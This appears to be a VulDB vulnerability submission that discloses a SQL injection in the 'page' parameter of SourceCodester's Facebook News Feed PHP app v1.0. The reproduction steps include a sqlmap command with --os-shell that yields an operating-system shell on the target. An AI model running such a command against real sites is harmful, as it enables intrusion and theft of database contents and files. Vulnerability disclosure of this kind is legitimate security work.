| Title | SourceCodester facebook 1.0 SQL Injection |
|---|
| Description | # Exploit Title: Facebook News Feed - SQL Injection
# Exploit Author: Raj
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache
Description:-
A SQL Injection issue in Facebook News Feed allows getting complete remote access to the website. Access such as database, files and everything.
Payload used:-
`python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell`
Vulnerable Parameter:-
`?page=`
Steps to reproduce:-
1. Here we take the GET method of "http://localhost:8080/fb/index.php?page=home" just this page only
2. In this we target our parameter as "page".
3. Now we are going to use the "SQLMap" tool with the following command
**python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell** |
|---|
| User | Cyberraj (UID 59481) |
|---|
| Submit | 2024-05-25 03:08 PM (2 years ago) |
|---|
| Moderation | 2024-05-25 08:25 PM (5 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 266302 [SourceCodester Facebook News Feed Like 1.0 index.php page SQL injection] |
|---|
| Points | 17 |
|---|